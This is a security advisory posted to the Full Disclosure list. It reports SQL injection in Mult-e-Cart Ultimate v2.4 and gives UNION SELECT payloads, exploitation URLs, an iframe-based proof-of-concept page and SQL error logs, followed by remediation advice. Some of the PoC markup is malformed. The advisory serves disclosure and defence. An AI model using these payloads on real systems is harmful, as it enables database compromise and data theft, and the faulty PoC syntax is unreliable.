[prev in list] [next in list] [prev in thread] [next in thread]
List: full-disclosure
Subject: [FD] Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
From: "info () vulnerability-lab ! com" <info () vulnerability-lab ! com>
Date: 2021-10-27 12:06:23
Message-ID: aa762c80-a23d-1067-593b-425594b79198 () vulnerability-lab ! com
[Download RAW message or body]
Document Title:
===============
Mult-e-Cart Ultimate v2.4 - SQL Injection Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2306
Release Date:
=============
2021-10-22
Vulnerability Laboratory ID (VL-ID):
====================================
2306
Common Vulnerability Scoring System:
====================================
7
Vulnerability Class:
====================
SQL Injection
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Digital Multivendor Marketplace Online Store - eShop CMS
(Source: https://ultimate.multecart.com/ & https://www.techraft.in/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple sql-injection web \
vulnerabilities in the Mult-e-Cart Ultimate v2.4 (v2021) web-application.
Affected Product(s):
====================
Techraft
Product: Digital Multivendor Marketplace Online Store v2.4 - eShop CMS (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2021-10-22: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Restricted Authentication (Moderator Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Independent Security Research
Technical Details & Description:
================================
Multiple classic sql-injection web vulnerabilities has been discovered in the Mult-e-Cart \
Ultimate v2.4 (v2021) web-application. The web vulnerability allows remote attackers to inject \
or execute own sql commands to compromise the database management system.
The vulnerabilities are located in the `id` parameter of the `view` and `update` function. The \
vulnerable modules are `inventory`, `customer`, `vendor` and `order`. Remote attackers with a \
vendor shop account are able to exploit the vulnerable id parameter to execute malicious sql \
commands. The request method to inject is get and the attack vector is located on the \
client-side. The remote vulnerability is a classic order by sql-injection. The issue is \
exploitable with one of the two vendor roles or higher privileged roles like admin.
Exploitation of the remote sql injection vulnerabilities requires no user interaction and a \
privileged vendor- or admin role user account. Successful exploitation of the remote sql \
injection results in database management system, web-server and web-application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] inventory/inventory/update
[+] /customer/customer/view
[+] /vendor/vendor/view
[+] /order/sub-order/view-order
Vulnerable Parameter(s):
[+] id
Proof of Concept (PoC):
=======================
The remote sql injection web vulnerabilities can be exploited by remote attackers with \
privileged backend panel access without user interaction. For security demonstration or to \
reproduce the remote sql-injection web vulnerability follow the provided information and steps \
below to continue.
PoC: Payloads
1' union select 1,2,3,4,@@version--&edit=t
1' union select 1,2,3,4,@@database--&edit=t
PoC: Exploitation
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select \
1,2,3,4,5--&edit=t https://multecartultimate.localhost:8080/customer/customer/view?id=1' union \
select 1,2,3,4,5--&edit=t https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' \
union select 1,2,3,4,5--&edit=t \
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union \
select 1,2,3,4,5
-
https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select \
1,2,3,4,5&edit=t https://multecartultimate.localhost:8080/customer/customer/view?id=1' union \
select 1,2,3,4,5&edit=t https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union \
select 1,2,3,4,5&edit=t \
https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select 1,2,3,4,5
PoC: Exploit
<html>
<head><body>
<title>Mult-E-Cart Ultimate - SQL Injection PoC</title>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select \
1,2,3,4,@@database--&edit=t" width="400" height="400"><br> \
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select \
1,2,3,4,@@database--&edit=t" width="400" height="400"><br> \
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select \
1,2,3,4,@@database--&edit=t" width="400" height="400"><br> \
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select \
1,2,3,4,@@database--" width="400" height="400"><br> <br>
<iframe="https://multecartultimate.localhost:8080/inventory/inventory/update?id=1' union select \
1,2,3,4,@@version--&edit=t" width="400" height="400"><br> \
<iframe="https://multecartultimate.localhost:8080/customer/customer/view?id=1' union select \
1,2,3,4,@@version--&edit=t" width="400" height="400"><br> \
<iframe="https://multecartultimate.localhost:8080/vendor/vendor/view?id=1' union select \
1,2,3,4,@@version--&edit=t" width="400" height="400"><br> \
<iframe="https://multecartultimate.localhost:8080/order/sub-order/view-order?id=' union select \
1,2,3,4,@@version--" width="400" height="400"> </body></head>
</html>
--- SQL Error Exception Handling Logs ---
SQLSTATE[42S22]: Column not found: 1054 Unknown column '100' in 'order clause'
The SQL being executed was: SELECT * FROM `tbl_inventory` WHERE id=1 order by 100--
-
PDOException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error in your \
SQL syntax; check the manual that corresponds to your MariaDB server version for the right \
syntax to use near ''' at line 1 in \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php:1299
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1299): PDOStatement->execute()
#1 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): \
yiidbCommand->internalExecute('SELECT * FROM `...') #2 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): \
yiidbCommand->queryInternal('fetch', NULL) #3 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne() #4 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL) #5 \
/home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): \
yiidbActiveQuery->one() #6 \
/home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): \
multebackmodulesinventorycontrollersInventoryController->findModel('-1'') #7 [internal \
function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'') #8 \
/home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, \
Array) #9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): \
yiibaseInlineAction->runWithParams(Array) #10 \
/home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): \
yiibaseController->runAction('update', Array) #11 \
/home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): \
yiibaseModule->runAction('inventory/inven...', Array) #12 \
/home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): \
yiiwebApplication->handleRequest(Object(yiiwebRequest)) #13 \
/home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run() #14 {main}
-
Next yiidbException: SQLSTATE[42000]: Syntax error or access violation: 1064 You have an error \
in your SQL syntax; check the manual that corresponds to your MariaDB server version for the \
right syntax to use near ''' at line 1 The SQL being executed was: SELECT * FROM \
`tbl_inventory` WHERE id=-1' in \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Schema.php:678
-
Stack trace:
#0 /home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1304): \
yiidbSchema->convertException(Object(PDOException), 'SELECT * FROM `...') #1 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(1165): \
yiidbCommand->internalExecute('SELECT * FROM `...') #2 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Command.php(421): \
yiidbCommand->queryInternal('fetch', NULL) #3 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/Query.php(287): yiidbCommand->queryOne() #4 \
/home/test/MulteCart/vendor/yiisoft/yii2/db/ActiveQuery.php(304): yiidbQuery->one(NULL) #5 \
/home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(536): \
yiidbActiveQuery->one() #6 \
/home/test/MulteCartUltimate/multeback/modules/inventory/controllers/InventoryController.php(300): \
multebackmodulesinventorycontrollersInventoryController->findModel('-1'') #7 [internal \
function]: multebackmodulesinventorycontrollersInventoryController->actionUpdate('-1'') #8 \
/home/test/MulteCart/vendor/yiisoft/yii2/base/InlineAction.php(57): call_user_func_array(Array, \
Array) #9 /home/test/MulteCart/vendor/yiisoft/yii2/base/Controller.php(181): \
yiibaseInlineAction->runWithParams(Array) #10 \
/home/test/MulteCart/vendor/yiisoft/yii2/base/Module.php(534): \
yiibaseController->runAction('update', Array) #11 \
/home/test/MulteCart/vendor/yiisoft/yii2/web/Application.php(104): \
yiibaseModule->runAction('inventory/inven...', Array) #12 \
/home/test/MulteCart/vendor/yiisoft/yii2/base/Application.php(392): \
yiiwebApplication->handleRequest(Object(yiiwebRequest)) #13 \
/home/test/MulteCartUltimate/multeback/web/index.php(153): yiibaseApplication->run() #14 {main}
Debug Array:
[0] => 42000
[1] => 1064
[2] => You have an error in your SQL syntax; check the manual that corresponds to your MariaDB \
server version for the right syntax to use near ''' at line 1
-
Reference(s):
https://multecartultimate.localhost:8080/vendor/vendor/view
https://multecartultimate.localhost:8080/customer/customer/view
https://multecartultimate.localhost:8080/inventory/inventory/update
https://multecartultimate.localhost:8080/order/sub-order/view-order
Solution - Fix & Patch:
=======================
The vulnerability can be resolved by the following description ...
1. Disable to display the sql errors for other users then the admin or pipe it into a local log \
file outside the panel ui 2. Use a prepared statement to protect the query against further \
injection attacks 3. Restrict the vulnerable id parameter to disallow usage of special chars of \
post and get method requests 4. Encode and escape the id content on get method request with the \
id parameter
Credits & Authors:
==================
Vulnerability-Lab [Research Team] - \
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. \
Vulnerability Lab disclaims all warranties, either expressed or implied, including the \
warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its \
suppliers are not liable in any case of damage, including direct, indirect, incidental, \
consequential loss of business profits or special damages, even if Vulnerability-Lab or its \
suppliers have been advised of the possibility of such damages. Some states do not allow the \
exclusion or limitation of liability for consequential or incidental damages so the foregoing \
limitation may not apply. We do not approve or encourage anybody to break any licenses, \
policies, deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com
Services: magazine.vulnerability-lab.com paste.vulnerability-db.com \
infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab \
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php \
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php \
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this file requires \
authorization from Vulnerability Laboratory. Permission to electronically redistribute this \
alert in its unmodified form is granted. All other rights, including the use of other media, \
are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, \
advisories, source code, videos and other information on this website is trademark of \
vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit \
our material contact (admin@ or research@) to get a ask permission.
Copyright © 2021 | Vulnerability Laboratory - [Evolution Security GmbH]â„¢
--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic